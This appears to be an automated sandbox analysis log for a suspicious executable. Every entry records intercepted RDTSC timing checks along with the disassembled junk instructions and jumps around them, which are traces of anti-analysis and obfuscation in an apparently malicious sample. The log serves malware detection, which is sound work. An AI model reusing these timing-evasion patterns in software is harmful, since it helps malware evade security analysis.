Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10AE41C second address: 10AE426 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76E5036BACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10AE8C4 second address: 10AE8CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10AE8CA second address: 10AE8CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B64BA second address: 10B64C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B64C0 second address: 10B64C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B64C5 second address: 10B64F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF7h 0x00000007 push edx 0x00000008 ja 00007F76E5186DE6h 0x0000000e jp 00007F76E5186DE6h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jg 00007F76E5186DF4h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B462C second address: 10B4646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F76E5036BB0h 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B4646 second address: 10B464C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B464C second address: 10B4665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5036BB5h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B4954 second address: 10B4959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B4959 second address: 10B4961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B4961 second address: 10B4965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B5418 second address: 10B5427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F76E5036BA6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B5427 second address: 10B5431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B5431 second address: 10B544B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F76E5036BB1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B5700 second address: 10B5711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DEDh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B59E2 second address: 10B59E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B59E6 second address: 10B59EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B59EC second address: 10B59F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B59F2 second address: 10B59F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B59F6 second address: 10B59FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B59FC second address: 10B5A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F76E5186DEAh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F76E5186DE6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B5A19 second address: 10B5A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B5C9A second address: 10B5CA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F76E5186DECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B5CA8 second address: 10B5CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B5CAC second address: 10B5CBD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F76E5186DECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B5F65 second address: 10B5F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B90B7 second address: 10B90BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B90BD second address: 10B90EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jg 00007F76E5036BBDh 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B922E second address: 10B9251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F76E5186DE6h 0x0000000c jc 00007F76E5186DE6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jc 00007F76E5186DE6h 0x0000001d je 00007F76E5186DE6h 0x00000023 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B9679 second address: 10B967E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10B9BE7 second address: 10B9BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10BE3CB second address: 10BE3F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F76E5036BB0h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10C708D second address: 10C7093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10C7093 second address: 10C7099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10C7099 second address: 10C709F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10C709F second address: 10C70AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10C5474 second address: 10C5486 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76E5186DE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F76E5186DE6h 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10C59E1 second address: 10C5A0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F76E5036BACh 0x0000000d jmp 00007F76E5036BB5h 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10C5A0F second address: 10C5A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007F76E5186DF0h 0x0000000d pushad 0x0000000e popad 0x0000000f jng 00007F76E5186DE6h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jp 00007F76E5186DEEh 0x0000001e jo 00007F76E5186DE6h 0x00000024 pushad 0x00000025 popad 0x00000026 jbe 00007F76E5186DEEh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10C5E4E second address: 10C5E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F76E5036BA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10CDCFB second address: 10CDD17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F76E5186DF3h 0x0000000a pop edi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10CD9E0 second address: 10CD9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10CD9E4 second address: 10CDA09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F76E5186DF5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jl 00007F76E5186E04h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10CFD31 second address: 10CFD4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10CFD4A second address: 10CFD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10DD546 second address: 10DD54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10DFBE6 second address: 10DFBEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10093F9 second address: 1009435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB2h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F76E5036BAAh 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F76E5036BB8h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b jmp 00007F76E5036BB0h 0x00000020 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10F3A35 second address: 10F3A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10F3A39 second address: 10F3A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F76E5036BA6h 0x0000000d jmp 00007F76E5036BB3h 0x00000012 jc 00007F76E5036BA6h 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b ja 00007F76E5036BA8h 0x00000021 pushad 0x00000022 popad 0x00000023 push esi 0x00000024 jmp 00007F76E5036BB1h 0x00000029 pushad 0x0000002a popad 0x0000002b pop esi 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10F3A82 second address: 10F3A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10F3CEA second address: 10F3CF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F76E5036BA6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10F3CF6 second address: 10F3CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10F8E11 second address: 10F8E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F76E5036BB2h 0x0000000b jmp 00007F76E5036BACh 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10FA68E second address: 10FA6A2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F76E5186DE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F76E5186DEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10FA6A2 second address: 10FA6A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10FA6A8 second address: 10FA6AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10FA6AE second address: 10FA6B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10FA6B2 second address: 10FA6B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10FA6B8 second address: 10FA6C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jns 00007F76E5036BA6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1102239 second address: 110224E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF0h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 11087FB second address: 1108800 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1108800 second address: 1108808 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 110C162 second address: 110C16A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 110C16A second address: 110C173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 110C173 second address: 110C177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 110BFB2 second address: 110BFC3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F76E5186DECh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 110BFC3 second address: 110BFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 110BFC9 second address: 110BFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F76E5186DF2h 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1128F02 second address: 1128F16 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F76E5036BA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F76E5036BACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1128F16 second address: 1128F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F76E5186DF7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1128F35 second address: 1128F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1128F39 second address: 1128F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1129376 second address: 112939F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F76E5036BA6h 0x0000000a pop edx 0x0000000b jmp 00007F76E5036BB9h 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112939F second address: 11293CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DEBh 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F76E5186DF1h 0x00000010 popad 0x00000011 pushad 0x00000012 jl 00007F76E5186DE6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 11293CB second address: 11293E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F76E5036BA6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F76E5036BA6h 0x00000015 jno 00007F76E5036BA6h 0x0000001b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1129845 second address: 112984F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F76E5186DECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112984F second address: 112986A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F76E5036BABh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 112986A second address: 1129870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1129870 second address: 1129874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1129874 second address: 112988B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 11299E4 second address: 1129A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F76E5036BAAh 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F76E5036BA6h 0x00000018 jmp 00007F76E5036BABh 0x0000001d rdtsc
